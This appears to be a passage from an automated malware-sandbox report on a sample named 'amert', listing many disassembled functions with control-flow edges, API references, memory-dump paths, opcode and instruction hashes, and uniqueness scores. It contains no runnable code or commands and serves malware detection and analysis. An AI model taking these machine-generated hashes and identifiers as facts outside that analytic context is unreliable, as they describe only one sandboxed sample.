                                                                                                                                                                                                                                        • Instruction ID: 64c0558bdbb85c4fafe61b113e1e1729958dab00c51fe6f69bd1616042484a31
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8eb933521ca3ddb23a75e5842e08857202aec62b33d2e494e7ca1dde9526caad
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DF08235502625669F336B26DD07F6B774DAF827F0F1A8026AD14AB680DA70E80286F0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00367540 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 560 367540-367544 561 367546 560->561 562 367548-367552 GetFileAttributesA 560->562 561->562 563 367554-367556 562->563 564 36755b-36755d 562->564 563->564 565 367558-36755a 563->565
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0036C434), ref: 00367549
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        • Opcode ID: 0a5401443707f49dca5bd81a2c082032e3dde3f1269a7e61069015b254d09219
                                                                                                                                                                                                                                        • Instruction ID: 72512ab1c9fbdf4e91dea69dea441e4935bf94a5e995ddaef0126f362fda997b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a5401443707f49dca5bd81a2c082032e3dde3f1269a7e61069015b254d09219
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABC08030015700DEFD1E5A3C5548065331159433EC3E457C8C2374B1E5C636D807D661
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC02E2 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 566 4fc02e2-4fc02e9 567 4fc02eb-4fc0486 566->567 568 4fc0284-4fc02b5 566->568 589 4fc048d-4fc0503 567->589 571 4fc02c5 568->571 571->571
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: 65e5dde60fb80e5aa44c126f834ede5e1a8b26610ab0fcff69eca929fb3f881b
                                                                                                                                                                                                                                        • Instruction ID: 99ce21279c6477b08a1da19fcc6275b24b07d20ad10c8c7b45a71557edc079d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65e5dde60fb80e5aa44c126f834ede5e1a8b26610ab0fcff69eca929fb3f881b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 043192AB28C122FE614286C52B14AFB6A2DE2C3730330853FF807D5403FA949A4F71B1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC02BA Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 595 4fc02ba-4fc0486 614 4fc048d-4fc0503 595->614
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: 327bf8034fb56ccdd458b3a2ef8ec42c6673aeb09ff4ee81de24cffdcc8bbae7
                                                                                                                                                                                                                                        • Instruction ID: 7637bf51b544837c6ae6164de9a532e72ae855e3f5caabf6631e5ff5e970b7de
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 327bf8034fb56ccdd458b3a2ef8ec42c6673aeb09ff4ee81de24cffdcc8bbae7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3313CEB28C122FD614282C62B18AF76A2EE2D6630371853EF817D5542FA849B5F2171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC02A3 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 620 4fc02a3-4fc02a8 621 4fc02aa-4fc02b2 620->621 622 4fc0321-4fc032a 620->622 623 4fc02b9-4fc02bc 621->623 624 4fc02b4-4fc02b5 621->624 625 4fc032c-4fc0331 622->625 626 4fc0357-4fc0361 622->626 628 4fc02c5 623->628 624->628 627 4fc0342-4fc0355 625->627 626->627 629 4fc0363 626->629 630 4fc0365-4fc0486 627->630 628->628 629->630 644 4fc048d-4fc0503 630->644
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: 4d252285e83e88d92105f6d15220fdec36cf627d5b068d3ebfe317183bc98988
                                                                                                                                                                                                                                        • Instruction ID: 9c66b3447c80366add1bb5c2a12bc1bbb21e0ec1baab23d01747932590721f63
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d252285e83e88d92105f6d15220fdec36cf627d5b068d3ebfe317183bc98988
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A31A6AB28C123FEA10286D52B589F76B2DE6D3630370846FF907D5403FA85AA4F6171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC02F7 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 650 4fc02f7-4fc0486 667 4fc048d-4fc0503 650->667
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: c0fc3673cc36affcfcdea1ef6f40ad955fa4bc3d2684ac40569432a253ef868b
                                                                                                                                                                                                                                        • Instruction ID: ba602e89641285490e288f2df623b22f9a43150eb200d3bfc037e938991d418e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0fc3673cc36affcfcdea1ef6f40ad955fa4bc3d2684ac40569432a253ef868b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B212DAB38C122FE614296C62B149BB6A2EE2D6630371C43AF807D5503FA949B4F3171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC0319 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 673 4fc0319-4fc032a 674 4fc032c-4fc0331 673->674 675 4fc0357-4fc0361 673->675 676 4fc0342-4fc0355 674->676 675->676 677 4fc0363 675->677 678 4fc0365-4fc0486 676->678 677->678 692 4fc048d-4fc0503 678->692
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: e3ca9487b941a7cd54056ba7c88e676cfb18be5e34041d924bd0da7e28509cda
                                                                                                                                                                                                                                        • Instruction ID: 96dac32247cc168cb3c907397c5e3abf611f0cd6b7929304d4ab3d5a099fd134
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3ca9487b941a7cd54056ba7c88e676cfb18be5e34041d924bd0da7e28509cda
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE214CEB28C022FE614286C52B589F76A2DF2D2630371842EF907D5403FA88AB4F3171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC0336 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 698 4fc0336-4fc0486 713 4fc048d-4fc0503 698->713
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: 89bd7ffa7063690a6a547609b96a237534315035868009b63a9c157bd6edfd22
                                                                                                                                                                                                                                        • Instruction ID: 1ad3a8fa744acafb0130e1b86649cb5e709d79d4f6f2e52f43432e2613018b4f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89bd7ffa7063690a6a547609b96a237534315035868009b63a9c157bd6edfd22
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90210CEB28C126FE614296C52B189F76A2DE2D6630371853EF807D5402FA949A4F6171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC035A Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 719 4fc035a-4fc0361 720 4fc0342-4fc0355 719->720 721 4fc0363 719->721 722 4fc0365-4fc0486 720->722 721->722 736 4fc048d-4fc0503 722->736
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: 8aa8ed40041353be5957f63338cd73a6e0e04289c6ae76fbea51366a6864064e
                                                                                                                                                                                                                                        • Instruction ID: fb16fa268cae00397d907e35be95097fd6f7c53058941922eaa1cf78682da8f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8aa8ed40041353be5957f63338cd73a6e0e04289c6ae76fbea51366a6864064e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F115EAB38C123FE610286D52B149BB6A2DE2D6230371842FF807D5402FA94AA4F3171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC036C Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        • Opcode ID: aa62591347aefae6b4e56ff096723b13bca310b38d1b97fe3a0679290b7831eb
                                                                                                                                                                                                                                        • Instruction ID: 2ff3a7a79a3b3420ddd834077e62eb31d735b5dd5cad368888b5ff3c9d0ce912
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa62591347aefae6b4e56ff096723b13bca310b38d1b97fe3a0679290b7831eb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F116AAB28C126FE610296C62B149FB6A2DE6D6330331842EF803D5402FB94AA0F2171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC0384 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 55876c8fcc5d0c32d7226a0d28bde0186078ab4130557d5f759a7b63427b62f4
                                                                                                                                                                                                                                        • Instruction ID: ad57be333a1bf7eba7c612f8ad3cff2bbadcd687c65fd880b79f83f1da219251
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55876c8fcc5d0c32d7226a0d28bde0186078ab4130557d5f759a7b63427b62f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92113DAB34C126FD614196C62B189FB6A2DE6D2730371852EF847D5003FB94AB1B7171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC0398 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1878c39defac828af9e246b88215f2ffd8d6e3363dc306bfb3ca9299fd5322a3
                                                                                                                                                                                                                                        • Instruction ID: fd8658c2e1e4066817c8e2a19031e60e00e16a5d7bfdb19aa2b5a6b669dd1437
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1878c39defac828af9e246b88215f2ffd8d6e3363dc306bfb3ca9299fd5322a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17111CEB38C026FD614196C62B189FB6A2DF6D6730371842EF947D5003FA989B0B7171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC03D7 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 198ae05b5ea1815ef9603867213111bd3791517cccdd1dd5ad00065f2eaef6a2
                                                                                                                                                                                                                                        • Instruction ID: 38042923c5fd10ea8004a1822b7d390bba35366d09357ea1e951c725ae7f862b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 198ae05b5ea1815ef9603867213111bd3791517cccdd1dd5ad00065f2eaef6a2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A114CAB24C022EEB201D6C56B58AB7676DE3D6730331846FF442D6003FA98AA5B6171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC03C2 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fbaf39583ae3a1dc117639b7f9c96f79a05c33b4ae6633bf6cf2ae42f319faf2
                                                                                                                                                                                                                                        • Instruction ID: 8ccd4b0f90f94823af9e823784530e1dc08774b68a0ea07b923606408410f371
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbaf39583ae3a1dc117639b7f9c96f79a05c33b4ae6633bf6cf2ae42f319faf2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 690109BB24C026FD654196C52B18AFB6B2DE2D6730370882EF846D5003FB949A0B6131
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC0443 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6ef13904a0584efc1a75cf84647b61010b2c1b51dfa5c095b826dde882eb1dbc
                                                                                                                                                                                                                                        • Instruction ID: e44db22d3533b438800403dfade74e7274919987431998394716d172d2ac3a5c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ef13904a0584efc1a75cf84647b61010b2c1b51dfa5c095b826dde882eb1dbc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB0184EB24C022EC7501D6D17B54AF7576DE2D1730371882FF542D1003FA489A4FA530
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC0411 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 149147256661550e805bbf6d3066382e643d1f9235dad66481bf4819b335ffba
                                                                                                                                                                                                                                        • Instruction ID: 19b005680b20f6b724f1290fb9ba72e223874bec5c07e1632c8d91d2afebd0af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 149147256661550e805bbf6d3066382e643d1f9235dad66481bf4819b335ffba
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4F0B6AF28C022EC7141D6C63B28ABB576DE2D1730371C82BF846D1402FA889A4F6170
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC042E Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 891ed1dce58bdfae14a938a907bbd8654c1601446098375c12a8b3055598ba71
                                                                                                                                                                                                                                        • Instruction ID: 63af71c14da0ab501ab9be4d43273e6af3095fba80e143afccf3b1ca7a60e77f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 891ed1dce58bdfae14a938a907bbd8654c1601446098375c12a8b3055598ba71
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AF0E7AB24C122EDA14196C52B18AFBA76DF3E1B30771892BF582D1402FA98964F6171
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC046E Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 71835a705e0e122488266bf5cec53d98feebc0b55cbf0c6468bc4b699b5f0c92
                                                                                                                                                                                                                                        • Instruction ID: c7332f1e9e3166decee8303b737c68c67f3b9f831f481138e183ac6df4c46f26
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71835a705e0e122488266bf5cec53d98feebc0b55cbf0c6468bc4b699b5f0c92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF098AB248022ED6145D6967728ABBA76DF2D5730371843BF442C2402AA94961FA130
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 04FC0479 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dd492818e716681498959863f10095b84b1915504b5cabf3ee2af9de20a99764
                                                                                                                                                                                                                                        • Instruction ID: 6a6ed0a5d987f1eef1184abdfc9628d646266061f9f3566129ba73fcbe5990bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd492818e716681498959863f10095b84b1915504b5cabf3ee2af9de20a99764
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCE0EDAF24C062ACB141D2C63B24AF7676DF2D1B31330C43BF842C5502FA84561F6130
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

